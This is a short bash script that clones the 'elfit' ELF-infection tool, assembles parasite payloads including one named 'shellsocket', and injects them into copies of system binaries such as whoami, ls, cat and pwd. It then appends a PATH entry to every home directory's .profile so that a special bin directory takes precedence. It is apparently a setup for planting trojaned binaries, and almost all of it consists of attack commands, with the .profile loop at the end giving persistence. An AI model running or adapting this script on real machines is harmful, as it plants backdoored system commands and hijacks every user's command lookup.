#!/bin/bash
cd /tmp
git clone https://github.com/NickStephens/elfit
cd elfit
make

cd parasites
nasm evil.asm
nasm shellsocket.asm
nasm sleeper.asm
cd ..

mkdir clean infected
cp /bin/cat /bin/date /bin/df /bin/ls /bin/mkdir /bin/pwd /usr/bin/whoami clean 
cp /bin/cat /bin/date /bin/df /bin/ls /bin/mkdir /bin/pwd /usr/bin/whoami infected

./elfit --parasite parasites/evil --reverse --entrypoint infected/whoami >> infected/whoami_output
./elfit --parasite parasites/evil --text --entrypoint infected/date >> infected/date_output
./elfit --parasite parasites/shellsocket --text --start-main init infected/ls >> infected/ls_output 
./elfit --parasite parasites/shellsocket --text --entrypoint infected/cat >> infected/cat_output
./elfit --parasite parasites/sleeper --text --got getcwd infected/pwd >> infected/pwd_output

for f in `find /home -maxdepth 1 -type d`; do
  if [ $f != "/home" ] ; then
    echo "PATH=/usr/special/bin:\$PATH" >> $f/.profile
  fi
done
